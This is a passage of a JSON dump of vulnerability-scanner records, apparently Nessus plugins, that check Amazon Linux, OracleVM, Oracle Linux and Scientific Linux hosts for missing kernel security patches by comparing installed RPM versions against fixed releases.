script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-debuginfo-common-i686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-tools-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/10/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/11/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/11/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"kernel-4.14.77-69.57.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-debuginfo-4.14.77-69.57.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", cpu:\"i686\", reference:\"kernel-debuginfo-common-i686-4.14.77-69.57.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-x86_64-4.14.77-69.57.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-devel-4.14.77-69.57.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-headers-4.14.77-69.57.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-tools-4.14.77-69.57.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-tools-debuginfo-4.14.77-69.57.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-tools-devel-4.14.77-69.57.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perf-4.14.77-69.57.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perf-debuginfo-4.14.77-69.57.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-debuginfo / kernel-debuginfo-common-i686 / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:30:16", "description": "The remote OracleVM system is missing necessary patches to address critical security updates :\n\n - scsi: sg: fixup infoleak when using SG_GET_REQUEST_TABLE (Hannes Reinecke) [Orabug: 26941755] (CVE-2017-14991)\n\n - failover: allow name change on IFF_UP slave interfaces (Si-Wei Liu) \n\n - Revert 'net_failover: delay taking over primary device to accommodate udevd renaming' (Si-Wei Liu) [Orabug:\n 29707258]\n\n - build: Revert 'repairing out-of-tree build functionality' (Todd Vierling) [Orabug: 30257829]\n\n - rds: add ibmr to busy_list in flush code path (Manjunath Patil)\n\n - rds: fix uninteneded increase of rds_rdma:pool->max_items_soft (Manjunath Patil)\n\n - ext4: fix data exposure after a crash (Jan Kara) [Orabug: 30361860] (CVE-2017-7495)", "cvss3": {}, "published": "2019-10-17T00:00:00", "type": "nessus", "title": "OracleVM 3.4 : Unbreakable / etc (OVMSA-2019-0047)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-14991", "CVE-2017-7495"], "modified": "2019-12-19T00:00:00", "cpe": ["p-cpe:/a:oracle:vm:kernel-uek", "p-cpe:/a:oracle:vm:kernel-uek-firmware", "cpe:/o:oracle:vm_server:3.4"], "id": "ORACLEVM_OVMSA-2019-0047.NASL", "href": "https://www.tenable.com/plugins/nessus/129986", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2019-0047.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(129986);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2019/12/19\");\n\n script_cve_id(\"CVE-2017-14991\", \"CVE-2017-7495\");\n\n script_name(english:\"OracleVM 3.4 : Unbreakable / etc (OVMSA-2019-0047)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - scsi: sg: fixup infoleak when using SG_GET_REQUEST_TABLE\n (Hannes Reinecke) [Orabug: 26941755] (CVE-2017-14991)\n\n - failover: allow name change on IFF_UP slave interfaces\n (Si-Wei Liu) \n\n - Revert 'net_failover: delay taking over primary device\n to accommodate udevd renaming' (Si-Wei Liu) [Orabug:\n 29707258]\n\n - build: Revert 'repairing out-of-tree build\n functionality' (Todd Vierling) [Orabug: 30257829]\n\n - rds: add ibmr to busy_list in flush code path (Manjunath\n Patil)\n\n - rds: fix uninteneded increase of\n rds_rdma:pool->max_items_soft (Manjunath Patil)\n\n - ext4: fix data exposure after a crash (Jan Kara)\n [Orabug: 30361860] (CVE-2017-7495)\"\n );\n # https://oss.oracle.com/pipermail/oraclevm-errata/2019-October/000962.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ca241a19\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel-uek / kernel-uek-firmware packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/10/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/10/17\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! preg(pattern:\"^OVS\" + \"3\\.4\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.4\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS3.4\", reference:\"kernel-uek-4.1.12-124.32.3.el6uek\")) flag++;\nif (rpm_check(release:\"OVS3.4\", reference:\"kernel-uek-firmware-4.1.12-124.32.3.el6uek\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel-uek / kernel-uek-firmware\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-25T14:30:07", "description": "The remote Oracle Linux 6 / 7 host has packages installed that are affected by multiple vulnerabilities as referenced in the ELSA-2019-4823 advisory.\n\n - The sg_ioctl function in drivers/scsi/sg.c in the Linux kernel before 4.13.4 allows local users to obtain sensitive information from uninitialized kernel heap-memory locations via an SG_GET_REQUEST_TABLE ioctl call for /dev/sg0. (CVE-2017-14991)\n\n - fs/ext4/inode.c in the Linux kernel before 4.6.2, when ext4 data=ordered mode is used, mishandles a needs- flushing-before-commit list, which allows local users to obtain sensitive information from other users' files in opportunistic circumstances by waiting for a hardware reset, creating a new file, making write system calls, and reading this file. (CVE-2017-7495)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2019-10-17T00:00:00", "type": "nessus", "title": "Oracle Linux 6 / 7 : Unbreakable Enterprise kernel (ELSA-2019-4823)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-14991", "CVE-2017-7495"], "modified": "2021-09-08T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "cpe:/o:oracle:linux:7", "p-cpe:/a:oracle:linux:kernel-uek", "p-cpe:/a:oracle:linux:kernel-uek-debug", "p-cpe:/a:oracle:linux:kernel-uek-debug-devel", "p-cpe:/a:oracle:linux:kernel-uek-devel", "p-cpe:/a:oracle:linux:kernel-uek-doc", "p-cpe:/a:oracle:linux:kernel-uek-firmware"], "id": "ORACLELINUX_ELSA-2019-4823.NASL", "href": "https://www.tenable.com/plugins/nessus/129990", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2019-4823.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(129990);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/09/08\");\n\n script_cve_id(\"CVE-2017-7495\", \"CVE-2017-14991\");\n\n script_name(english:\"Oracle Linux 6 / 7 : Unbreakable Enterprise kernel (ELSA-2019-4823)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle Linux host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Oracle Linux 6 / 7 host has packages installed that are affected by multiple vulnerabilities as referenced in\nthe ELSA-2019-4823 advisory.\n\n - The sg_ioctl function in drivers/scsi/sg.c in the Linux kernel before 4.13.4 allows local users to obtain\n sensitive information from uninitialized kernel heap-memory locations via an SG_GET_REQUEST_TABLE ioctl\n call for /dev/sg0. (CVE-2017-14991)\n\n - fs/ext4/inode.c in the Linux kernel before 4.6.2, when ext4 data=ordered mode is used, mishandles a needs-\n flushing-before-commit list, which allows local users to obtain sensitive information from other users'\n files in opportunistic circumstances by waiting for a hardware reset, creating a new file, making write\n system calls, and reading this file. (CVE-2017-7495)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://linux.oracle.com/errata/ELSA-2019-4823.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-7495\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/10/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/10/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-firmware\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"linux_alt_patch_detect.nasl\", \"ssh_get_info.nasl\");\n script_require_keys(\"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/local_checks_enabled\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('ksplice.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item('Host/OracleLinux')) audit(AUDIT_OS_NOT, 'Oracle Linux');\nvar release = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, 'Oracle Linux');\nvar os_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Oracle Linux');\nvar os_ver = os_ver[1];\nif (! preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'Oracle Linux 6 / 7', 'Oracle Linux ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Oracle Linux', cpu);\nif ('x86_64' >!< cpu) audit(AUDIT_ARCH_NOT, 'x86_64', cpu);\n\nvar machine_uptrack_level = get_one_kb_item('Host/uptrack-uname-r');\nif (machine_uptrack_level)\n{\n var trimmed_uptrack_level = ereg_replace(string:machine_uptrack_level, pattern:\"\\.(x86_64|i[3-6]86|aarch64)$\", replace:'');\n var fixed_uptrack_levels = ['4.1.12-124.32.3.el6uek', '4.1.12-124.32.3.el7uek'];\n foreach var fixed_uptrack_level ( fixed_uptrack_levels ) {\n if (rpm_spec_vers_cmp(a:trimmed_uptrack_level, b:fixed_uptrack_level) >= 0)\n {\n audit(AUDIT_PATCH_INSTALLED, 'KSplice hotfix for ELSA-2019-4823');\n }\n }\n __rpm_report = 'Running KSplice level of ' + trimmed_uptrack_level + ' does not meet the minimum fixed level of ' + join(fixed_uptrack_levels, sep:' / ') + ' for this advisory.\\n\\n';\n}\n\nvar kernel_major_minor = get_kb_item('Host/uname/major_minor');\nif (empty_or_null(kernel_major_minor)) exit(1, 'Unable to determine kernel major-minor level.');\nvar expected_kernel_major_minor = '4.1';\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, 'running kernel level ' + expected_kernel_major_minor + ', it is running kernel level ' + kernel_major_minor);\n\nvar pkgs = [\n {'reference':'kernel-uek-4.1.12-124.32.3.el6uek', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-4.1.12'},\n {'reference':'kernel-uek-debug-4.1.12-124.32.3.el6uek', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-debug-4.1.12'},\n {'reference':'kernel-uek-debug-devel-4.1.12-124.32.3.el6uek', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-debug-devel-4.1.12'},\n {'reference':'kernel-uek-devel-4.1.12-124.32.3.el6uek', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-devel-4.1.12'},\n {'reference':'kernel-uek-doc-4.1.12-124.32.3.el6uek', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-doc-4.1.12'},\n {'reference':'kernel-uek-firmware-4.1.12-124.32.3.el6uek', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-firmware-4.1.12'},\n {'reference':'kernel-uek-4.1.12-124.32.3.el7uek', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-4.1.12'},\n {'reference':'kernel-uek-debug-4.1.12-124.32.3.el7uek', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-debug-4.1.12'},\n {'reference':'kernel-uek-debug-devel-4.1.12-124.32.3.el7uek', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-debug-devel-4.1.12'},\n {'reference':'kernel-uek-devel-4.1.12-124.32.3.el7uek', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-devel-4.1.12'},\n {'reference':'kernel-uek-doc-4.1.12-124.32.3.el7uek', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-doc-4.1.12'},\n {'reference':'kernel-uek-firmware-4.1.12-124.32.3.el7uek', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-firmware-4.1.12'}\n];\n\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var sp = NULL;\n var cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'EL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference && release) {\n if (exists_check) {\n if (rpm_exists(release:release, rpm:exists_check) && rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n } else {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_NOTE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'kernel-uek / kernel-uek-debug / kernel-uek-debug-devel / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:59:17", "description": "Security Fix(es) :\n\n - kernel: rtl_p2p_noa_ie in drivers/net/wireless/realtek/rtlwifi/ps.c in the Linux kernel lacks a certain upper-bound check, leading to a buffer overflow (CVE-2019-17666)\n\n - kernel: offset2lib allows for the stack guard page to be jumped over (CVE-2017-1000371)", "cvss3": {}, "published": "2020-04-24T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : kernel on SL6.x i386/x86_64 (20200422) (Stack Clash)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000371", "CVE-2019-17666"], "modified": "2020-04-28T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:kernel", "p-cpe:/a:fermilab:scientific_linux:kernel-abi-whitelists", "p-cpe:/a:fermilab:scientific_linux:kernel-debug", "p-cpe:/a:fermilab:scientific_linux:kernel-debug-debuginfo", "p-cpe:/a:fermilab:scientific_linux:kernel-debug-devel", "p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo", "p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo-common-i686", "p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo-common-x86_64", "p-cpe:/a:fermilab:scientific_linux:kernel-devel", "p-cpe:/a:fermilab:scientific_linux:kernel-doc", "p-cpe:/a:fermilab:scientific_linux:kernel-firmware", "p-cpe:/a:fermilab:scientific_linux:kernel-headers", "p-cpe:/a:fermilab:scientific_linux:perf", "p-cpe:/a:fermilab:scientific_linux:perf-debuginfo", "p-cpe:/a:fermilab:scientific_linux:python-perf", "p-cpe:/a:fermilab:scientific_linux:python-perf-debuginfo", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20200422_KERNEL_ON_SL6_X.NASL", "href": "https://www.tenable.com/plugins/nessus/135959", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(135959);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/04/28\");\n\n script_cve_id(\"CVE-2017-1000371\", \"CVE-2019-17666\");\n\n script_name(english:\"Scientific Linux Security Update : kernel on SL6.x i386/x86_64 (20200422) (Stack Clash)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security Fix(es) :\n\n - kernel: rtl_p2p_noa_ie in\n drivers/net/wireless/realtek/rtlwifi/ps.c in the Linux\n kernel lacks a certain upper-bound check, leading to a\n buffer overflow (CVE-2019-17666)\n\n - kernel: offset2lib allows for the stack guard page to be\n jumped over (CVE-2017-1000371)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind2004&L=SCIENTIFIC-LINUX-ERRATA&P=29160\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?11aabf84\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo-common-i686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:python-perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/24\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = 